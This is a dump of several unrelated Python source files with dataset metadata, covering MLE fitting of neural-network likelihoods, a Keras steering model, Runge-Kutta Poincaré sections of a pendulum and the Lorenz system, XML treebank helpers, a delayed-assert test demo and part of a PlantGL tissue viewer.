')\n yaml_config_path = os.getcwd() + '/kde_mle_parallel.yaml' # MANUAL INTERVENTION\n with open(yaml_config_path, 'r') as stream:\n config_data = yaml.unsafe_load(stream)\n \n # Handle cuda business if necessary\n # Handle some cuda business (if desired to use cuda here..)\n if config_data['cuda_on']:\n print('Handle cuda business....') \n os.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\" # see issue #152\n os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"3\"\n print(device_lib.list_local_devices())\n \n # Load Model\n print('Loading model .... ')\n model_dtype = config_data['model_dtype']\n \n if model_dtype == 'ckpt':\n model_path = config_data['model_path']\n ckpt_path = config_data['ckpt_path']\n model = keras.models.load_model(model_path)\n model.load_weights(ckpt_path)\n if model_dtype == 'h5':\n model_path = config_data['model_path']\n model = keras.models.load_model(model_path, custom_objects = {\"huber_loss\": tf.losses.huber_loss})\n \n # get network architecture for numpy forward pass (used in mle, coming from ktnp imported)\n weights, biases, activations = ktnp.extract_architecture(model)\n\n # LOAD CONFIG FILE INTO VARIABLES ----\n print('Setting parameters from config file .... ')\n n_runs = config_data['n_runs'] # number of mles to compute in main loop\n n_samples = config_data['n_samples'] # samples by run\n n_workers = config_data['n_workers'] # number of workers to choose for parallel mle\n save_mle_out = config_data['save_mle_out']\n mle_out_path = config_data['mle_out_path']\n param_bounds = config_data['param_bounds']\n param_bounds_epsilon = config_data['param_bounds_epsilon']\n parameter_names = config_data['param_names']\n param_varies = config_data['param_varies']\n param_is_boundary_param = config_data['param_is_boundary_param']\n meta_data_file_path = config_data['meta_data_file_path']\n n_subjects = config_data['n_subjects']\n boundary = eval(config_data['boundary'])\n boundary_multiplicative = config_data['boundary_multiplicative']\n network_trained_on_log = config_data['network_trained_on_log']\n \n # optimizer properties:\n de_optim_popsize = config_data['de_optim_popsize']\n \n # NOTE PARAMETERS: \n # WEIBULL: [v, a, w, node, shape, scale]\n # LINEAR COLLAPSE: [v, a, w, node, theta]\n # DDM: [v, a, w]\n # FULL_DDM: [v, a, w, dw, sdv]\n # LBA: [v_0, ..., v_n, A, b, s]\n \n print('Finishing up initialization .... 
')\n\n # MAKE COLUMNS FOR OPTIMIZER RESULT TABLE ---------\n \n if n_subjects == 1:\n p_sim = []\n p_mle = []\n\n for parameter_name in parameter_names:\n p_sim.append(parameter_name + '_sim')\n p_mle.append(parameter_name + '_mle')\n\n my_optim_columns = p_sim + p_mle + ['n_samples']\n\n # Initialize the data frame in which to store optimizer results\n optim_results = pd.DataFrame(np.zeros((n_runs, len(my_optim_columns))), columns = my_optim_columns)\n optim_results.iloc[:, 2 * len(parameter_names)] = n_samples\n \n else:\n # get adjusted parameter vector which takes into account multiple subjects in parameter space\n parameter_names_adj, parameter_bounds_adj, parameter_bounds_epsilon_adj = adjust_params_names_group(\n params = parameter_names,\n params_bounds = param_bounds,\n params_bounds_epsilon = param_bounds_epsilon,\n param_varies = param_varies,\n n_subjects = n_subjects)\n\n p_sim = []\n p_mle = []\n\n for parameter_name in parameter_names_adj:\n p_sim.append(parameter_name + '_sim')\n p_mle.append(parameter_name + '_mle')\n\n my_optim_columns = p_sim + p_mle + ['n_samples']\n\n # Initialize the data frame in which to store optimizer results\n optim_results = pd.DataFrame(np.zeros((n_runs, len(my_optim_columns))), columns = my_optim_columns)\n optim_results.iloc[:, 2 * len(parameter_names_adj)] = n_samples\n \n # -----------------------------------------------------\n \n print('Start of MLE procedure .... ')\n # Main loop -------------------------------------------------------------\n for i in range(0, n_runs, 1): \n\n # Get start time\n start_time = time.time()\n \n if n_subjects == 1:\n # Make dataset\n data, tmp_params = make_data(param_bounds = param_bounds, \n param_bounds_epsilon = param_bounds_epsilon,\n param_is_boundary_param = param_is_boundary_param, \n param_names = parameter_names)\n \n # Print some info on run\n print('Parameters for run ' + str(i) + ': ')\n print(tmp_params)\n \n # Run optimizer\n out_parallel = differential_evolution(ktnp.log_p, \n bounds = param_bounds,\n args = (weights, biases, activations, data, network_trained_on_log),\n popsize = de_optim_popsize,\n disp = True, \n workers = n_workers)\n \n # Store results\n optim_results.iloc[i, :len(parameter_names)] = tmp_params \n optim_results.iloc[i, len(parameter_names):(2*len(parameter_names))] = out_parallel.x\n\n else:\n # Make dataset\n print(parameter_names)\n data, tmp_params = make_data_group(param_bounds = parameter_bounds_adj,\n param_bounds_epsilon = parameter_bounds_epsilon_adj,\n param_is_boundary_param = param_is_boundary_param,\n params_ordered = parameter_names,\n param_varies = param_varies,\n params_names = parameter_names_adj,\n n_subjects = n_subjects)\n \n # Print some info on run\n print('Parameters for run ' + str(i) + ': ')\n print(tmp_params)\n\n # Run optimizer\n out_parallel = differential_evolution(ktnp.group_log_p, \n bounds = parameter_bounds_adj,\n args = (weights, \n biases, \n activations, \n data, \n param_varies, \n parameter_names, \n parameter_names_adj,\n network_trained_on_log),\n popsize = de_optim_popsize,\n disp = True, \n workers = n_workers)\n # Store results\n optim_results.iloc[i, :len(parameter_names_adj)] = tmp_params # KEEP OUTSIDE OF MAKE_DATA CALL\n optim_results.iloc[i, len(parameter_names_adj):(2*len(parameter_names_adj))] = out_parallel.x\n\n print('Solution vector of current run: ')\n print(out_parallel.x)\n\n print('The run took: ')\n elapsed = time.time() - start_time\n print(time.strftime(\"%H:%M:%S\", time.gmtime(elapsed)))\n\n # 
----------------------------------------------------------\n if save_mle_out:\n # Save optimization results to file\n optim_results.to_csv(mle_out_path + '/mle_results_' + uuid.uuid1().hex + '.csv')","sub_path":"deprecated/kde_mle_parallel.py","file_name":"kde_mle_parallel.py","file_ext":"py","file_size_in_byte":14584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"364903746","text":"import pandas as pd\r\nimport numpy as np\r\nimport random\r\nimport matplotlib.pyplot as plt\r\nimport cv2\r\nimport matplotlib.image as mpimg\r\nimport math\r\nimport json\r\nimport h5py\r\nimport keras\r\nfrom keras.models import Sequential, Model\r\nfrom keras.layers import Convolution2D, Flatten, MaxPooling2D, Lambda, ELU\r\nfrom keras.layers.core import Dense, Dropout\r\nfrom keras.optimizers import Adam\r\nfrom keras.callbacks import Callback\r\nfrom keras.layers.normalization import BatchNormalization\r\nfrom keras.regularizers import l2\r\nfrom keras.callbacks import ModelCheckpoint\r\nfrom sklearn.model_selection import train_test_split\r\n# loading dataset\r\ndf = pd.read_csv('interpolated.csv')\r\ndf.drop(['index','timestamp','width','height',\r\n 'lat','long','alt'], 1, inplace = True)\r\ndata = df.values\r\n# center, left and right cameras\r\nleft = []\r\nleft_steer = []\r\nright = []\r\nright_steer = []\r\ncenter = []\r\ncenter_steer = []\r\nfor i in range(len(df)):\r\n if df['frame_id'][i] == 'left_camera':\r\n left.append(df['filename'][i])\r\n left_steer.append(df['angle'][i])\r\n elif df['frame_id'][i] == 'right_camera':\r\n right.append(df['filename'][i])\r\n right_steer.append(df['angle'][i])\r\n elif df['frame_id'][i] == 'center_camera':\r\n center.append(df['filename'][i])\r\n center_steer.append(df['angle'][i])\r\n\r\n# 80:20 split\r\nnum_split = int(0.8*len(center))\r\n\r\nX_train = center[:num_split]\r\nX_validation = center[num_split:]\r\ny_train = center_steer[:num_split]\r\ny_validation = center_steer[num_split:]\r\n\r\n# Only the images from center camera have been used\r\n# current steering angle\r\n# difference between current and future image\r\n\r\n# Model Hyperparameters\r\nPROCESSED_IMG_ROWS = 66\r\nPROCESSED_IMG_COLS = 200\r\nPROCESSED_IMG_CHANNELS = 3\r\nBATCH_SIZE = 64\r\nNB_EPOCH = 10\r\nFUTURE_INDEX = 20\r\n# function to crop and resize\r\ndef im_crop_resize(image):\r\n image = image[-240 :,:,:]\r\n image = cv2.resize(image, (PROCESSED_IMG_COLS,PROCESSED_IMG_ROWS), interpolation = cv2.INTER_AREA)\r\n return image \r\n\r\ndef load_and_augment_image(image_file):\r\n image = mpimg.imread(image_file)\r\n image = im_crop_resize(image)\r\n return image\r\n\r\nrandom.seed(7)\r\ngenerated_steering_angles = []\r\ndef generate_batch_data(image_data, steering_data, batch_size = BATCH_SIZE, future_index = FUTURE_INDEX):\r\n batch_images = np.empty([batch_size, PROCESSED_IMG_ROWS, PROCESSED_IMG_COLS, PROCESSED_IMG_CHANNELS])\r\n batch_images.astype('uint8')\r\n batch_steering = np.zeros(batch_size)\r\n \r\n while 1:\r\n for batch_index in range(batch_size):\r\n row_index = np.random.randint(len(image_data))\r\n steer_angle = steering_data[row_index]\r\n if row_index >= (len(image_data) - future_index):\r\n row_index = len(image_data) - row_index\r\n image1 = load_and_augment_image(image_data[row_index])\r\n image2 = load_and_augment_image(image_data[row_index + future_index])\r\n \r\n batch_images[batch_index] = image1 - image2\r\n batch_steering[batch_index] = steer_angle\r\n generated_steering_angles.append(steer_angle)\r\n 
yield batch_images, batch_steering\r\n\r\n# Model\r\n\r\nmodel = Sequential()\r\nmodel.add(Lambda(lambda x: x/127.5 - 1., input_shape = (PROCESSED_IMG_ROWS, PROCESSED_IMG_COLS, PROCESSED_IMG_CHANNELS)))\r\nmodel.add(Convolution2D(24, 5, 5, subsample = (2, 2), activation = 'elu', name = 'Conv1'))\r\nmodel.add(Convolution2D(36, 5, 5, subsample = (2, 2), activation = 'elu', name = 'Conv2'))\r\nmodel.add(Convolution2D(48, 5, 5, subsample = (2, 2), activation = 'elu', name = 'Conv3'))\r\nmodel.add(Convolution2D(64, 3, 3, activation = 'elu', name = 'Conv4'))\r\nmodel.add(Convolution2D(64, 3, 3, activation = 'elu', name = 'Conv5'))\r\nmodel.add(Flatten())\r\nmodel.add(Dropout(0.2))\r\nmodel.add(ELU())\r\nmodel.add(Dense(100, activation = 'elu', name = 'FC1'))\r\nmodel.add(Dropout(0.2))\r\nmodel.add(Dense(50, activation = 'elu', name = 'FC2'))\r\nmodel.add(Dropout(0.2))\r\nmodel.add(Dense(10, activation = 'elu', name = 'FC3'))\r\nmodel.add(Dropout(0.2))\r\nmodel.add(Dense(1, activation = 'elu', name = 'FC4'))\r\nmodel.summary()\r\n\r\n# checkpoints\r\n\r\ncheckpoint = ModelCheckpoint(filepath = '/content/drive/model2_2-{epoch:003d}.h5', \r\n monitor = 'val_loss',\r\n verbose = 1,\r\n save_best_only = False,\r\n mode = 'auto')\r\n\r\n# compile\r\nopt = Adam(lr = 0.001)\r\nmodel.compile(optimizer = opt, loss = 'mse', metrics = [])\r\n\r\nclass LifecycleCallback(keras.callbacks.Callback):\r\n \r\n def on_epoch_begin(self, epoch, logs = {}):\r\n pass\r\n \r\n def on_epoch_end(self, epoch, logs = {}):\r\n global threshold\r\n threshold = 1 / (epoch + 1)\r\n \r\n def on_batch_begin(self, batch, logs = {}):\r\n pass\r\n \r\n def on_batch_end(self, batch, logs = {}):\r\n self.losses.append(logs.get('loss'))\r\n \r\n def on_train_begin(self, logs = {}):\r\n print('BEGIN TRAINING!...')\r\n self.losses = []\r\n \r\n def on_train_end(self, logs = {}):\r\n print('END TRAINING')\r\n \r\n# Calculate the correct number of samples per epoch based on batch size\r\n\r\ndef calc_samples_per_epoch(array_size, batch_size):\r\n num_batches = array_size / batch_size\r\n samples = math.ceil(num_batches)\r\n samples_per_epoch = int((samples * batch_size)) \r\n return samples_per_epoch\r\n\r\n# Let the training begin !\r\n\r\nlifecycle_callback = LifecycleCallback()\r\n\r\ntrain_generator = generate_batch_data(X_train, y_train, BATCH_SIZE)\r\nvalidation_generator = generate_batch_data(X_validation, y_validation, BATCH_SIZE)\r\n\r\nsamples_per_epoch = calc_samples_per_epoch(len(X_train), BATCH_SIZE)\r\nnb_val_samples = calc_samples_per_epoch(len(X_validation), BATCH_SIZE)\r\n\r\nhistory = model.fit_generator(train_generator,\r\n validation_data = validation_generator,\r\n samples_per_epoch = len(X_train),\r\n nb_val_samples = len(X_validation),\r\n nb_epoch = NB_EPOCH, verbose = 1,\r\n callbacks = [lifecycle_callback, checkpoint])\r\n\r\n# save model\r\nmodel.save(\"/content/drive/model2_2.h5\")\r\nmodel_json = model.to_json()\r\nwith open(\"/content/drive/model2.json\", \"w\") as json_file:\r\n json.dump(model_json, json_file)\r\nmodel.save_weights(\"/content/drive/model2_weights_2.h5\")\r\nprint(\"saved model to disk\")\r\n\r\nbinwidth = 0.025\r\nplt.figure()\r\nplt.hist(generated_steering_angles, bins=np.arange(min(generated_steering_angles), max(generated_steering_angles) + binwidth, binwidth))\r\nplt.title('Number of augmented images per steering angle')\r\nplt.xlabel('Steering Angle')\r\nplt.ylabel('# Augmented 
Images')\r\nplt.savefig(\"/content/drive/batchaug_steering_angles_2_2.png\")\r\n\r\nplt.figure()\r\nprint(history.history.keys())\r\n\r\n# summarize history for epoch loss\r\nplt.plot(history.history['loss'])\r\nplt.plot(history.history['val_loss'])\r\nplt.title('model loss')\r\nplt.ylabel('loss')\r\nplt.xlabel('epoch')\r\nplt.legend(['train', 'validation'], loc='upper right')\r\n\r\nplt.savefig(\"/content/drive/model2_nvidia_loss_eps_2_2.png\")\r\n\r\n# summarize history for batch loss\r\nplt.figure()\r\nbatch_history = lifecycle_callback.losses\r\nplt.plot(batch_history)\r\nplt.title('model loss')\r\nplt.ylabel('loss')\r\nplt.xlabel('batches')\r\n\r\nplt.savefig(\"/content/drive/model2_nvidia_loss_batches_2_2.png\")\r\n\r\n\r\n\r\n \r\n \r\n\r\n","sub_path":"TemporalModel_MODEL5.py","file_name":"TemporalModel_MODEL5.py","file_ext":"py","file_size_in_byte":7488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"131907842","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport sympy as sy\n\ndef plot(x_values, y_values, initialConditions,i):\n plt.plot(x_values,y_values, 'o', markersize = 0.5)\n plt.xlabel(r'$x$')\n plt.ylabel(r'$z$')\n #plt.savefig(str(theta0) + '-' + str(omega0) + '.png')\n #plt.savefig('lorenz'+str(r[i])+'-'+str(initialConditions[0])+'-'+str(initialConditions[1])+'-'+str(initialConditions[2])+'.png')\n plt.savefig('testing.png')\n plt.clf()\n\ndef plotPoincare(x_values, y_values, T, typeName, timestep=-1, option=-1):\n plt.plot(x_values,y_values, 'o', markersize = 0.5)\n plt.xlabel(r'$x$')\n plt.ylabel(r'$z$')\n #plt.xlim([9,17.5])\n #plt.ylim([18,55])\n #plt.xlim([-0.1,0.])\n #plt.ylim([18,55])\n plt.savefig('poincareSpatial' + str(T) + typeName + str(option) + str(timestep) +'.png')\n plt.clf()\n\ndef writetofile(thetaValues, omegaValues):\n for i in range(0, len(thetaValues)):\n outString = str(thetaValues[i]) + \", \" + str(omegaValues[i]) + \", \" + \"\\n\"\n with open('output' + str(runningCounter) + '.csv', \"a\") as f:\n f.write(outString)\n\ndef trajectories(x,h,n,f,t):\n k1 = []\n k2 = []\n k3 = []\n k4 = []\n xi1 = []\n for i in range(n):\n k1.append(h*f[i](x,t))\n for i in range(n):\n xi1.append(x[i] + k1[i]*0.5)\n for i in range(n):\n k2.append(f[i](xi1, t + h/2)*h)\n for i in range(n):\n xi1[i] = x[i] + k2[i]*0.5\n for i in range(n):\n k3.append(f[i](xi1, t + h/2)*h)\n for i in range(n):\n xi1[i] = x[i] + k3[i]\n for i in range(n):\n k4.append(f[i](xi1, t +h)*h)\n for i in range(n):\n xi1[i] = x[i] + (k1[i] + 2*(k2[i] + k3[i]) + k4[i])/6\n return xi1\n\n\ndef rk4(t0, h, n, n_dims, xt0, f, system):\n x = xt0\n trajectory1 = []\n trajectory2 = []\n trajectory3 = []\n timeStamp = []\n trajectory1.append(x[0])\n trajectory2.append(x[1])\n timeStamp.append(t0)\n t = t0\n for i in range(n):\n x_new = trajectories(x, h, n_dims, f, t)\n x = x_new\n trajectory1.append(x_new[0])\n trajectory2.append(x_new[1])\n if system > 0:\n trajectory3.append(x_new[2])\n timeStamp.append(t+h)\n t += h\n #print(\"trajectory1: {}\".format(trajectory1[0:250])\n if system == 0:\n newTrajectory1 = []\n for i in range(len(trajectory1)):\n newTrajectory1.append(trajectory1[i]%(2*np.pi))\n plot(newTrajectory1,trajectory2,[0,0,0],0)\n return[newTrajectory1, trajectory2, timeStamp]\n else:\n return [trajectory1, trajectory2, trajectory3]\n\n\ndef poincare(T):\n trajectoryVector = rk4(0,timestep, int(1000/timestep),len(f), xt0, f,0)\n poincare1 = []\n poincare2 = []\n n = 1\n threshHold = T\n helper = 0\n checker = 0.0\n 
pointCounter = 0\n while (helper < len(trajectoryVector[2])):\n checker += timestep\n if (checker > threshHold*pointCounter):\n pointCounter += 1\n poincare1.append(trajectoryVector[0][helper])\n poincare2.append(trajectoryVector[1][helper])\n helper += 1\n\n print(pointCounter)\n #writetofile(poincare1, poincare2)\n plotPoincare(poincare1, poincare2, T, 'temporal', timestep)\n\n\ndef poincareInterpolation(T):\n trajectoryVector = rk4(0,timestep, int(1000/timestep),len(f), xt0, f,0)\n poincare1 = []\n poincare2 = []\n n = 1\n threshHold = T\n helper = 0\n checker = 0.0\n pointCounter = 0\n while (helper < len(trajectoryVector[2])):\n checker += timestep\n if (checker > threshHold*pointCounter):\n # t = sy.symbols('t')\n # prevPoint = [trajectoryVector[0][helper-1],trajectoryVector[1][helper-1]]\n # nextPoint = [trajectoryVector[0][helper],trajectoryVector[1][helper]]\n # xt = prevPoint[0]+(prevPoint[0]-nextPoint[0])*t\n # yt = prevPoint[1]+(prevPoint[1]-nextPoint[1])*t\n # point_on_plane = [xt.subs(t,threshHold*pointCounter),yt.subs(t,threshHold*pointCounter)]\n t_prev_to_plane = np.abs(threshHold*pointCounter - trajectoryVector[2][helper-1])\n point_on_plane = trajectories([trajectoryVector[0][helper-1],trajectoryVector[1][helper-1]],t_prev_to_plane, 2, f, trajectoryVector[2][helper-1])\n poincare1.append(point_on_plane[0])\n poincare2.append(point_on_plane[1])\n pointCounter += 1\n poincare1.append(point_on_plane[0])\n poincare2.append(point_on_plane[1])\n helper += 1\n\n print(pointCounter)\n writetofile(poincare1, poincare2)\n plotPoincare(poincare1, poincare2, T, 'temporal-intp', timestep)\n\n\ndef poincareSpatial(option, f,x):\n t = sy.symbols('t')\n xx = sy.symbols('xx')\n y = sy.symbols('y')\n trajectoryVector = rk4(0,timestep, 10000,3, x, f,1)\n poincare1 = []\n poincare2 = []\n n = 1\n if option == 0:\n norm = [0,1,0]\n x_sigma = [0,20,0]\n else:\n norm = [-2,1,0]\n x_sigma = [2,4,0]\n pointCounter = 0\n for i in range(len(trajectoryVector[0])-2):\n prevPoint = [trajectoryVector[0][i],trajectoryVector[1][i],trajectoryVector[2][i]]\n nextPoint = [trajectoryVector[0][i+1],trajectoryVector[1][i+1],trajectoryVector[2][i+1]]\n d_prevPoint = [trajectoryVector[0][i]-x_sigma[0],trajectoryVector[1][i]-x_sigma[1],trajectoryVector[2][i]-x_sigma[2]]\n d_nextPoint = [trajectoryVector[0][i+1]-x_sigma[0],trajectoryVector[1][i+1]-x_sigma[1],trajectoryVector[2][i+1]-x_sigma[2]]\n #print(prevPoint,nextPoint)\n dot1 = np.dot(d_prevPoint,norm)\n dot2 = np.dot(d_nextPoint, norm)\n #print(dot1,dot2)\n print(dot2)\n if np.sign(dot1) <= 0 and np.sign(dot2) > 0:\n pointCounter += 1\n xt = prevPoint[0]+(prevPoint[0]-nextPoint[0])*t\n yt = prevPoint[1]+(prevPoint[1]-nextPoint[1])*t\n zt = prevPoint[2]+(prevPoint[2]-nextPoint[2])*t\n intersection_point = 0\n point_on_plane = []\n if option == 0:\n intersection_point = sy.solve(yt-0*xt+0*zt-20, t)\n point_on_plane = [xt.subs(t,intersection_point[0]),yt.subs(t,intersection_point[0]),zt.subs(t,intersection_point[0])]\n else:\n intersection_point = sy.solve(yt-2*xt+0*zt, t)\n point_on_plane = [xt.subs(t,intersection_point[0]),yt.subs(t,intersection_point[0]),zt.subs(t,intersection_point[0])]\n poincare1.append(point_on_plane[0])\n poincare2.append(point_on_plane[2])\n print(pointCounter)\n print(poincare1)\n #writetofile(poincare1, poincare2)\n plotPoincare(poincare1, poincare2, 0, 'spatial-intp', option)\n\n\n\ndef ftheta(x,t):\n return x[1]\n\ndef fomega(x,t):\n l = .1\n m = .1\n g = 9.8\n A = 0.9\n #A = 0\n alpha = 0.75*np.sqrt(g/l)\n beta = 0.25\n #beta = 
0\n    return ((A * np.cos(alpha*t))-(beta*l*x[1])-(m*g*np.sin(x[0])))/(m*l)\n\nf = [ftheta, fomega]\ntheta0 = 0.01\nomega0 = 0\nxt0 = [theta0,omega0,0]\ntimestep = 0.1\n#rk4(0,timestep, 10000,len(f), xt0, f)\nl = .1\nm = .1\ng = 9.8\ndef lorenz(a,r,b,x0,y0,z0):\n    def fx(x,t):\n        return a*(x[1]-x[0])\n    def fy(x,t):\n        return r*x[0]-x[1]-x[0]*x[2]\n    def fz(x,t):\n        return x[0]*x[1]-b*x[2]\n\n    f = [fx, fy, fz]\n    x = [x0,y0,z0]\n    timestep = 0.005\n    tol = 10\n    poincareSpatial(1,f,x)\n    #rk4(0,timestep,200,len(f),x,f)\n#poincare(0.75*2*np.pi*np.sqrt(l/g))\n#poincareInterpolation(0.75*2*np.pi*np.sqrt(l/g))\n#poincare(2)\n#runningCounter = input('Number:')\nlorenz(16,50,4,-13,-13,52)\n\n#poincareInterpolation(0.75*2*np.pi*np.sqrt(l/g))\n","sub_path":"7PS/poincare.py","file_name":"poincare.py","file_ext":"py","file_size_in_byte":7598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
{"seq_id":"354939263","text":"\"\"\" XML Utils\n\"\"\"\n\nfrom lxml import etree as ET\n\ndef to_str(xml):\n    \"\"\" Convert XML to string\n    \"\"\"\n    return ET.tostring(xml, encoding='utf-8', pretty_print=True,\n                       xml_declaration=False)\n\n\ndef get_treebank_forms(file, all_data=0):\n    \"\"\" Get treebank token forms\n    \"\"\"\n    sentences = []\n    for el in ET.parse(file).xpath('//*'):\n        if el.tag == 'sentence':\n            sentences.append([])\n        elif el.tag == 'word':\n            if all_data:\n                sentences[-1].append(el.attrib)\n                if 'artificial' in el.attrib:\n                    sentences[-1][-1]['ellipsis-id'] = el.attrib['id']\n                    sentences[-1][-1]['lemma'] = ''\n                    sentences[-1][-1]['postag'] = ''\n            else:\n                ellipsis = 1 if 'artificial' in el.attrib else 0\n                sentences[-1].append((el.attrib['id'], el.attrib['form'], ellipsis))\n\n    return sentences\n","sub_path":"papygreek/controllers/tools/xml.py","file_name":"xml.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
{"seq_id":"85561469","text":"'''\nDemo: continue the rest of the tests after an assert fails\n\nCreated on Jul 20, 2016\n\n@author: WAH\n'''\nfrom pats.pyunit.testtemplate import TestCaseTemplate\nfrom pats.delayedAssert import expect, assert_expectations\n\n\nclass Case0304(TestCaseTemplate):\n\n    @classmethod\n    def setUpClass(cls):\n        pass\n\n    @classmethod\n    def tearDownClass(cls):\n        pass\n\n    def setUp(self):\n        super(Case0304, self).setUp()\n\n    def tearDown(self):\n        pass\n\n    def test_01(self):\n\n        step = \"verify current equals to expected\"\n        current = 1\n        expected = 2\n        err_message = \"%s => failed\"%step\n        self.perform(self.assertEqual, current, expected, err_message)\n\n        step = \"verify result is expected\"\n        result = False\n        err_message = \"%s => failed\"%step\n        self.perform(self.assertTrue, result, err_message)\n\n        step = \"verify items in two lists are equal\"\n        current = [1, 3, 5, \"A\", \"google\"]\n        expected = [\"google\", 5, \"A\", 1, 3]\n        err_message = \"%s => failed\"%step\n        self.perform(self.assertCountEqual, current, expected, err_message)\n\n        current = [1, 3, 5, \"koodo\", \"A\"]\n        self.perform(self.assertCountEqual, current, expected, err_message)\n\n        step = \"verify result contains expected item\"\n        result = \"Hello world python\"\n        target = \"World\"\n        err_message = \"%s => failed\"%step\n        self.perform(self.assertIn, target, result, err_message)\n\n        #self._verifyErrors()\n\n\n    def test_02(self):\n\n        step = \"verify current equals to expected\"\n        current = 1\n        expected = 2\n        err_message = \"%s => failed\"%step\n        expect(current == expected, err_message)\n\n        step = \"verify 
result is expected\"\n result = False\n err_message = \"%s => failed\"%step\n expect(result is True, err_message)\n\n step = \"verify items in two lists are equal\"\n current = [1, 3, 5, \"A\", \"google\"]\n expected = [\"google\", 5, \"A\", 1, 3]\n err_message = \"%s => failed\"%step\n expect(current == expected, err_message)\n\n current = [1, 3, 5, \"koodo\", \"A\"]\n expect(current == expected, err_message)\n\n step = \"verify result contains expected item\"\n result = \"Hello world python\"\n target = \"World\"\n err_message = \"%s => failed\"%step\n expect(target in result, err_message)\n\n assert_expectations()\n\n\nif __name__ == \"__main__\":\n Case0304.execute()\n","sub_path":"docs/samples/pyunit test project/tests/suite03/case0304.py","file_name":"case0304.py","file_ext":"py","file_size_in_byte":2469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"633925953","text":"# -*- python -*-\n#\n# tissueview: function used to display tissue properties\n#\n# Copyright 2006 INRIA - CIRAD - INRA \n#\n# File author(s): Jerome Chopard \n#\n# Distributed under the Cecill-C License.\n# See accompanying file LICENSE.txt or copy at\n# http://www.cecill.info/licences/Licence_CeCILL-C_V1-en.html\n# \n# OpenAlea WebSite : http://sa_oa.gforge.inria.fr\n#\n\n__doc__=\"\"\"\nThis module defines functions to display a property on a topomesh\n\"\"\"\n\n__license__= \"Cecill-C\"\n__revision__=\" $Id: $ \"\n\nfrom PyQt4.QtCore import Qt,SIGNAL\nfrom sa_vp.plantgl.algo import GLRenderer\nfrom sa_vp.plantgl.scenegraph import Material,Scene,Shape\nfrom sa_oa.pglviewer import SceneView\nfrom model_output.graph_prop_display import (draw_graph_prop,\n _mat_map_func)\n\ndefault_mat = Material()\ndefault_mat.transparency = 0.5\n\nclass GraphScalarPropView (SceneView) :\n\t\"\"\"View on a scalar prop defined on a mesh.\n\t\"\"\"\n\tdef __init__ (self, graph, pos, deg, prop, shrink, cmap) :\n\t\tSceneView.__init__(self)\n\t\tself.idmode = GLRenderer.ShapeId\n\t\tself.set_alpha_threshold(0.1)\n\t\t\n\t\tself.set_name(\"scalar_prop\")\n\t\t\n\t\tself._graph = graph\n\t\tself._pos = pos\n\t\tself._deg = deg\n\t\tself._prop = prop\n\t\tself._shrink = shrink\n\t\tself._cmap = cmap\n\t\t\n\t\tself._triangulation_method = 'topo'\n\t\tself._cache_geometry = None\n\t\n\tdef redraw (self, send_signal = True) :\n\t\tif self._cache_geometry is None :\n\t\t\tsc = draw_graph_prop (self._graph, self._pos, self._deg, self._prop, self._shrink, self._cmap,\n None, 'topo')\n\t\telse :\n\t\t\tsc = Scene()\n\t\t\tmat_map = _mat_map_func(self._prop,\n\t\t\t self._cmap,\n\t\t\t default_mat)\n\t\t\tfor wid,geom in self._cache_geometry.iteritems() :\n\t\t\t\tmat = mat_map(wid)\n\t\t\t\tif mat is not None :\n\t\t\t\t\tshp = Shape(geom,mat)\n\t\t\t\t\tshp.id = wid\n\t\t\t\t\tsc.add(shp)\n\t\t\n\t\tself.clear(False)\n\t\tself.merge(sc,send_signal)\n\t\n\tdef cache_geometry (self, cache = True) :\n\t\t\"\"\"Precompute the geometry.\n\t\t\n\t\tUse this function to accelerate\n\t\tthe redraw of a scene if the\n\t\tunderlying geometry do not change.\n\t\t\n\t\t:Parameters:\n\t\t - `cache` (bool) - if True, compute\n\t\t the actual geometry of a scene and\n\t\t store it. 
Else, reset any precomputed\n\t\t geometry\n\t\t\n\t\t:Returns Type: False\n\t\t\"\"\"\n\t\tif cache :\n\t\t\tsc = draw_graph_prop(self._graph,\n\t\t\t self._pos,\n\t\t\t self._deg,\n\t\t\t self._prop,\n\t\t\t self._shrink,\n\t\t\t self._cmap,\n\t\t\t default_mat,\n\t\t\t self._triangulation_method)\n\t\t\t\n\t\t\tself._cache_geometry = dict( (shp.id,shp.geometry) \\\n\t\t\t for shp in sc)\n\n\t\telse :\n\t\t\tself._cache_geometry = None\n\n\n\t\n\t##############################################\n\t#\n\t#\tinteraction\n\t#\n\t##############################################\n\tdef prop_type (self) :\n\t\t\"\"\"Retrieve the type of value\n\t\tstored in this quantity.\n\t\t\n\t\t:Return:\n\t\t - a string defining the type\n\t\t - None if no type is defined\n\t\t\n\t\t:Returns Type:\n\t\t - str\n\t\t - None\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._prop.type()\n\t\texcept AttributeError :\n\t\t\treturn None\n\t\n\tdef value (self, elmid) :\n\t\t\"\"\"Returns the value of the property.\n\t\t\"\"\"\n\t\treturn self._prop.get(elmid,None)\n\t\n\tdef set_value (self, elmid, val, send_signal = True) :\n\t\t\"\"\"Set the value of the property.\n\t\t\"\"\"\n\t\tif val is None :\n\t\t\tself._prop.pop(elmid,None)\n\t\telse :\n\t\t\tself._prop[elmid] = val\n\t\tif send_signal :\n\t\t\tself.emit(SIGNAL(\"set_value\"),elmid,val)\n\t\n\tdef values (self) :\n\t\t\"\"\"Iterator on all (wid,val).\n\t\t\"\"\"\n\t\treturn self._prop.iteritems()\n\t\n\tdef set_values (self, items) :\n\t\t\"\"\"Change all values.\n\t\t\"\"\"\n\t\tself._prop.clear()\n\t\tself._prop.update(items)\n\t\tself.emit(SIGNAL(\"set_values\") )\n\t\n\tdef clear_values (self) :\n\t\t\"\"\"Clear property\n\t\t\"\"\"\n\t\tself._prop.clear()\n\t\tself.emit(SIGNAL(\"clear_values\") )\n\t\n\tdef fill (self, elmid, val) :\n\t\t\"\"\"Fill a zone around the given element\n\t\twith the given value.\n\t\t\"\"\"\n\t\tmesh = self._graph\n\t\tdeg = self._deg\n\t\tprop = self._prop\n\t\told_val = prop.get(elmid,None)\n\t\t#temporary\n\t\tassert deg > 